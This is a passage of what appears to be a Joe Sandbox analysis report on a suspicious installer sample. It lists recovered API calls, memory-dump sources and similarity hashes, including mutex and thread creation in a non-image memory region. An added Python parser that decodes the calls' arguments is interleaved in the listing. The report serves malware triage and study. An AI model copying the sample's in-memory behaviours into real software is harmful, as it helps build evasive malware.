• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
• Instruction ID: b9c2064567b20e793381e804e5bc2438c092fd9c167849d7407d8daf0e01c371
• Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
• Instruction Fuzzy Hash: 1951CA75A006299BCB22DB99D9C1BDDB3FCAF4C304F8041DAE509E7211D634AF858F69
APIs
• ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001200D
• ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001201E
• ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012029
• ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10012053
• ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10012083
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
• String ID:
• API String ID: 4206206407-0
• Opcode ID: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
• Instruction ID: ed5e708f9a507b4adfd911d3508ec20c212b5a391fedcf247e80062d61f76bb5
• Opcode Fuzzy Hash: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
• Instruction Fuzzy Hash: C531C5F9E00108BBDB04EFA4D89599D7BB6EF54244F008069F9069F242EB31EAD5CB95
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004EF7
• memset.VCRUNTIME140(?,00000000,?), ref: 10004F34
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004F51
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10004F69
• memset.VCRUNTIME140(?,00000000,?), ref: 10004F97
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 10004FB5
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: ByteCharMultiWide$memset
• String ID:
• API String ID: 1216362210-0
• Opcode ID: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
• Instruction ID: b6c0c3fe9f7a8ecbfd6a68903a988b9ee954c4047185b56f79f4f3260df6d144
• Opcode Fuzzy Hash: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
• Instruction Fuzzy Hash: 71312FB5E40208BFEB14DBD8CC86FAEB7B5EB48710F204254F615AB2C0D671AB408B55
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00646290
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0064F22D,00000000,0064FB5F), ref: 006462BF
• GetWindowLongW.USER32(?,000000EC), ref: 006462D4
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 006462FB
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00646314
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00646335
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
• Instruction ID: 4dd900cc12852a0d25872cc702cb4c4dd59defd6bf464013fc66fcb0f6f5a345
• Opcode Fuzzy Hash: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
• Instruction Fuzzy Hash: F0112E35344701BFCB00DB68DD91FD237E9AB1A355F0452A5F645DB3B2CAB8E8809B44
APIs
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00404872
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 00404878
• GetStdHandle.KERNEL32(000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00404897
• WriteFile.KERNEL32(00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0040489D
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 004048B4
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 004048BA
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FileHandleWrite
• String ID:
• API String ID: 3320372497-0
• Opcode ID: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
• Instruction ID: 9db4a11d59ebcb307a3cfeeab30a2223b0d8a9ead0fdef3697f8df52dc81456b
• Opcode Fuzzy Hash: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
• Instruction Fuzzy Hash: 3C01A9E26053103EF610FB6A9D86F5B2ADC8B4576AF10463B7218F31D2C9389D44937E
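The API lines in the entries above (GetStdHandle/WriteFile at 004083E9 and 00404872, GetWindowLongW/SetWindowPos/ShowWindow at 00646290, MultiByteToWideChar at 10004EF7) all share one layout: `Name.MODULE(arg,arg,...), ref: address`, with numeric arguments printed as eight hex digits, recovered string literals printed raw and `?` for unknown values. The following parser is an added example for triaging such listings; it is not code from Joe Sandbox or from this report. It assumes that values such as 000000F5, 000000F4 and 000000EC are `push imm8` operands printed without sign extension (they line up with STD_OUTPUT_HANDLE = -11, STD_ERROR_HANDLE = -12 and GWL_EXSTYLE = -20), that the symbolic names come from the standard Windows SDK headers, and that trailing arguments beyond an API's declared parameter count are stack slots, not parameters. The sample lines are copied from the entries above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# Constructed sample: six lines in the shape of the "APIs" entries of this report.
SAMPLE_LINES = [
    "• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083E9",
    "• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083EF",
    "• GetWindowLongW.USER32(?,000000EC), ref: 00646290",
    "• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0064F22D,00000000,0064FB5F), ref: 006462BF",
    "• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004EF7",
    "• ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001200D",
]

# Name.MODULE(optional args), ref: hex   -- the mangled C++ exports carry no parentheses.
LINE_RE = re.compile(
    r"^\s*[•*-]?\s*(?P<name>.+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Numeric arguments are exactly eight hex digits (optionally negative, e.g. -00000004);
# anything else is a string literal the plugin recovered, and '?' is unknown.
NUM_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

Arg = Union[int, str, None]


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Arg]
    ref: int


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if NUM_RE.match(tok):
        return int(tok, 16)
    return tok


def parse_calls(lines) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # The report does not quote strings, so a literal containing a comma would be split here.
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def imm8_signed(v: int) -> int:
    """Assumption: a `push imm8` operand is printed as its raw byte, so -11 shows as
    000000F5. Recover the signed value for the 0x80..0xFF range, pass others through."""
    return v - 0x100 if 0x80 <= v <= 0xFF else v


# Windows SDK constants for the parameters seen in these entries.
STD_HANDLES = {-10: "STD_INPUT_HANDLE", -11: "STD_OUTPUT_HANDLE", -12: "STD_ERROR_HANDLE"}
GWL_INDEX = {-4: "GWL_WNDPROC", -6: "GWL_HINSTANCE", -8: "GWL_HWNDPARENT", -12: "GWL_ID",
             -16: "GWL_STYLE", -20: "GWL_EXSTYLE", -21: "GWL_USERDATA"}
CODEPAGES = {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}
SW_CMDS = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 5: "SW_SHOW", 8: "SW_SHOWNA", 9: "SW_RESTORE"}
SWP_FLAGS = [(0x1, "SWP_NOSIZE"), (0x2, "SWP_NOMOVE"), (0x4, "SWP_NOZORDER"), (0x8, "SWP_NOREDRAW"),
             (0x10, "SWP_NOACTIVATE"), (0x20, "SWP_FRAMECHANGED"), (0x40, "SWP_SHOWWINDOW"),
             (0x80, "SWP_HIDEWINDOW")]


def annotate(call: ApiCall) -> Dict[int, str]:
    """Map parameter index -> symbolic name for the APIs in these entries. Only the
    leading arguments are parameters; the trace also dumps stack slots past them."""
    def num(i: int) -> Optional[int]:
        return call.args[i] if i < len(call.args) and isinstance(call.args[i], int) else None

    notes: Dict[int, str] = {}
    n = call.name
    if n == "GetStdHandle" and num(0) is not None:
        notes[0] = STD_HANDLES.get(imm8_signed(num(0)), f"0x{num(0):X}")
    elif n in ("GetWindowLongW", "GetWindowLongA", "SetWindowLongW", "SetWindowLongA") and num(1) is not None:
        notes[1] = GWL_INDEX.get(imm8_signed(num(1)), f"0x{num(1):X}")
    elif n in ("MultiByteToWideChar", "WideCharToMultiByte") and num(0) is not None:
        notes[0] = CODEPAGES.get(num(0), f"codepage {num(0)}")
    elif n == "ShowWindow" and num(1) is not None:
        notes[1] = SW_CMDS.get(num(1), f"0x{num(1):X}")
    elif n == "SetWindowPos" and num(6) is not None:
        notes[6] = "|".join(name for bit, name in SWP_FLAGS if num(6) & bit) or "0"
    return notes


if __name__ == "__main__":
    for c in parse_calls(SAMPLE_LINES):
        print(f"{c.ref:08X} {c.module}!{c.name} {annotate(c)}")
```

Run over the window routine at 00646290, the two SetWindowPos flag words decode to SWP_NOSIZE|SWP_NOMOVE|SWP_NOZORDER|SWP_NOACTIVATE plus SWP_HIDEWINDOW (0x97) and then SWP_SHOWWINDOW (0x57) around a GWL_EXSTYLE read and write, which is the hide/modify/show sequence needed for an extended-style change to take effect. The decode is a triage aid only: whether a given 0xEC really is a sign-extended immediate has to be confirmed against the disassembly.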
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 0040403F
                                                                                    • Sleep.KERNEL32(0000000A,00000000,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA), ref: 00404055
                                                                                    • Sleep.KERNEL32(00000000,?,-00000004,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C), ref: 00404083
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,-00000004,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C), ref: 00404099
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction ID: f1ec43ae1c30d41b10cc41b48195bce38923192b9b407a0b5587fa379d4d1d3c
                                                                                    • Opcode Fuzzy Hash: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction Fuzzy Hash: 1FC136B2A002618FC715CF69E884316BFE5ABC5311F0882BFE555AB3D1C3B8DA41DB94
                                                                                    APIs
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 00CE5DE1
                                                                                    • GetLastError.KERNEL32 ref: 00CE5DEA
                                                                                    • CloseHandle.KERNEL32(?), ref: 00CE5DFB
                                                                                    • GetCurrentThread.KERNEL32 ref: 00CE5E13
                                                                                    • WaitForSingleObject.KERNEL32(00000000), ref: 00CE5E1A
                                                                                    • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 00CE5E2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3416154964-0
                                                                                    • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction ID: 47696616b45df94fa155a4e1f942072f2906b2646584eae5d677752322e22ff4
                                                                                    • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction Fuzzy Hash: 6E014F30A94758FBF791ABF08C8EB5D3A64EB08702F108450F70AAA1D0DAB4DB448B25
                                                                                    APIs
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600BE9
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600C10
                                                                                    • SetForegroundWindow.USER32(?), ref: 00600C21
                                                                                    • DefWindowProcW.USER32(?,?,?,?,00000000,00600EE8,?,00000000,00600F26), ref: 00600ED3
                                                                                    Strings
                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00600D5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostWindow$ForegroundProc
                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                    • API String ID: 602442252-3182603685
                                                                                    • Opcode ID: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
                                                                                    • Instruction ID: ab36fd57ef67da6a4d73ccec4cc41cbfff4955b2beb65bb6a2c22b7cd4e29d0d
                                                                                    • Opcode Fuzzy Hash: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
                                                                                    • Instruction Fuzzy Hash: 65911134644204AFE719DF58CD61F9ABBBAEB89700F1584AAF804AB3E1C675AD40CF14
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 00407C7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$X7@$iB
                                                                                    • API String ID: 3192549508-2475287703
                                                                                    • Opcode ID: 6e439ee28c1b6b67f9ec44174080eca639c9944c0a14d27f714a052d0cab6a9f
                                                                                    • Instruction ID: 9b8732aad967581ee1cfddc98b064603106c7b26d23cb4f63de0fa6512a07937
                                                                                    • Opcode Fuzzy Hash: 6e439ee28c1b6b67f9ec44174080eca639c9944c0a14d27f714a052d0cab6a9f
                                                                                    • Instruction Fuzzy Hash: 3C417F71A0C2059FE720DF14D884B2BB7A5EF94314F15856AE549AB3D1C738FC82CB6A
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: .tmp$_iu$jd
                                                                                    • API String ID: 3498533004-1802150322
                                                                                    • Opcode ID: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
                                                                                    • Instruction ID: 3061496996edbf0f295552ba256b7f5cd8ef57c15fc1c95d12c7dd96c3447177
                                                                                    • Opcode Fuzzy Hash: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
                                                                                    • Instruction Fuzzy Hash: 9C31A430A4021DABDB10EBA5C846BEEBBB4FF45314F10417AF640B72D2DA786E059758
                                                                                    APIs
                                                                                      • Part of subcall function 005A3A28: GetCursorPos.USER32 ref: 005A3A2F
                                                                                    • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 005A3B9F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005A3BD9
                                                                                    • WaitMessage.USER32(00000000,005A3C1D,?,?,?,00000000), ref: 005A3BFD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
